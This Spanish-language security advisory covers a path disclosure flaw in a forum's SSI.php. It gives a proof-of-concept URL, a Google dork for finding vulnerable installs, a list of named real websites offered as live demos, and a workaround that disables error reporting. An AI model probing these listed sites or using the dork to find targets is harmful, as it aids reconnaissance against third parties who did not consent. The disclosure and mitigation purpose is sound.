Summario:
--------------
Una falla de seguridad permitiría a un atacante conocer el directorio local donde se encuentra el sistema web.
Detalles:
-----------
SSI.php Linea 294:
// Fetch a post with a particular ID. By default will only show if you have permission to the see the board in question - this can be overriden.
function ssi_fetchPosts($post_ids, $override_permissions = false, $output_method = 'echo')
{
$post_id no está definido. Posible solución: ($post_id = false)
Prueba de concepto:
-------
http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
Google Dorks:
---------------------
inurl:?index.php?action=help
Demos:
-----------
http://simpleportal.net/SSI.php?ssi_function=fetchPosts
http://www.furgovw.org/SSI.php?ssi_function=fetchPosts
http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts
http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts
http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts
http://voceteopr.com/SSI.php?ssi_function=fetchPosts
http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts
http://othforums.com/SSI.php?ssi_function=fetchPosts
http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts
Solución temporal:
---------------------
En el archivo SSI.php linea 45 dice:
Código:
$ssi_error_reporting = error_reporting(defined('E_STRICT') ? E_ALL | E_STRICT : E_ALL);
Reemplazar por:
Código:
$ssi_error_reporting = error_reporting(0);
Funciones afectadas:
-----------------------
. fetchMember
. fetchPosts
. fetchGroupMembers
. queryMembers
Fuentes:
http://whk.drawcoders.net/index.php/topic,2792.0.html
http://seclists.org/fulldisclosure/2013/Jan/14